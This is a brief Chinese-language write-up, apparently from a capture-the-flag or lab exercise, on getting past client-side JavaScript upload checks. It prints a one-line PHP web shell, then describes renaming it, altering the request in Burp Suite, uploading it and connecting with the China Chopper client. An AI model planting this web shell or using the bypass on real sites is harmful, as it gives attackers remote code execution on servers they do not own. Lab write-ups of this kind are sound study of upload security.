根据提示这是本地js文件上传绕过 有两种思路,第一种将浏览器中的js检验代码删除
第二种
<?php eval($_POST[a])?>
将一句话木马的后缀改成可以上传的文件类型,利用burp suit抓包再改包绕过js 改包过程 上传成功 获取上传的图片地址,在网页上打开,得到一个url 打开中国菜刀 进行连接